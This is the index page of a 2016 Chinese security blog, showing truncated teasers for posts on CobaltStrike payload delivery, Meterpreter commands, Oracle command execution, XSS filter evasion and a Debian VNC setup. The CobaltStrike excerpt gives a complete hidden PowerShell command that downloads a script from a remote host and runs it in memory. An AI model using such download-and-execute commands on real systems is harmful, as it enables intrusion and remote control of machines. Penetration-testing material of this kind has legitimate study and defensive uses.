CobaltStrike 3.x远程调用脚本获取会话的4种模式

RedFree | CobaltStrike, JAVA, Metasploit, Python, Windows | 2016-10-19
CobaltStrike 3.x远程调用脚本获取会话的4种模式
在CobaltStrike 3.x中有4种远程调用脚本执行载荷的方法:1、Powershell远程调用命令:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.118/rev'))"远程脚本内容:$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("... [阅读全文]

CobaltStrike 2.5无法交互执行cmd命令修复

RedFree | CobaltStrike, JAVA, Metasploit | 2016-10-18
CobaltStrike 2.5无法交互执行cmd命令修复
Metasploit 4.11.4版本之后msgpack进行了一次升级,导致CobaltStrike2.4和之前的版本都不能正常使用了。CobaltStrike 2.5对msgpack也进行了升级,但从此之后不能正常交互执行cmd命令了。报错信息如下: [-] Meterpreter 1 error while executing 'read 1': java.nio.charset.MalformedInputExcep... [阅读全文]
ė114 次访问 6没有评论 0, ,

Oracle iSQL Plus/sqlplus执行系统命令的方法

RedFree | Oracle, 经验积累 | 2016-10-06
Oracle iSQL Plus/sqlplus执行系统命令的方法
Oracle安装后若开放5560端口,则可以利用此端口从Web界面登录。若拥有dba权限的数据库账户,则可使用这个Web后台执行系统命令。如图:执行命令的步骤如下:1、创建Javacreate or replace and compile java souRCe named "util" as import java.io.*; import java.lang.*; public c... [阅读全文]
ė98 次访问 6没有评论 0, ,

Debian 安装轻量级远程桌面 Xfce & VNC & Firefox

RedFree | Linux, 经验积累 | 2016-09-24
Debian 安装轻量级远程桌面 Xfce & VNC & Firefox
Xfce 是一个轻量级的Linux或类Unix的桌面系统,适用于多种 *NIX 系统的轻量级桌面环境。它被设计用来提高您的效率,在节省系统资源的同时,能够快速加载和执行应用程序。选择Xfce主要还是考虑其低耗资源的特点,基本 安装启动后内存消耗只有 40M 左右,对于大多数小内存的 VPS 而言是非常好的选择。1、检查或编辑 sources.list,添加debian源vim&nb... [阅读全文]
ė124 次访问 6没有评论 0, , , ,

XSS Filter Evasion Cheat Sheet 中文版

RedFree | XSS, 经验积累 | 2016-09-19
原文地址:http://drops.wooyun.org/tips/1955 前言译者注: 翻译本文的最初原因是当我自己看到这篇文章后,觉得它是非常有价值。但是这么著名的一个备忘录却一直没有人把它翻译成中文版。很多人仅仅是简单的把文中的 各种代码复制下来,然后看起来很刁的发在各种论坛上,不过你要真去认真研读这些代码,就会完全不知所云了。原因是这篇文章最精... [阅读全文]
ė134 次访问 6没有评论 0,

ASP/PHP/JSP获取参数的顺序及参数叠加效果

RedFree | JAVA, PHP, Windows, 经验积累, 默认分类 | 2016-09-18
ASP/PHP/JSP获取参数的顺序及参数叠加效果
一、ASP代码<%response.write(request("id"))%>测试效果分析    ASP的GET参数比POST参数的优先级高,参数叠加提交最终会以逗号分割拼接。二、PHP代码<?php echo($_REQUEST['id']);?>测试效果分析PHP(php7)的POST参数优先级比GET高,参数叠加提交最终会使用最后一个参数值。三、JSP代码<%out.prin... [阅读全文]
ė120 次访问 6没有评论 0, ,

Meterpreter常用命令

RedFree | CobaltStrike, Metasploit | 2016-09-14
1 基本原理1.1 预备知识Metasploit Framework是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。exploit是指“漏洞及其利用”,其利用一切可以利用的工具、采取一切可以采取的方法、找到一切可以找到的漏洞。并且对漏洞资料... [阅读全文]
ė100 次访问 6没有评论 0
Ɣ回顶部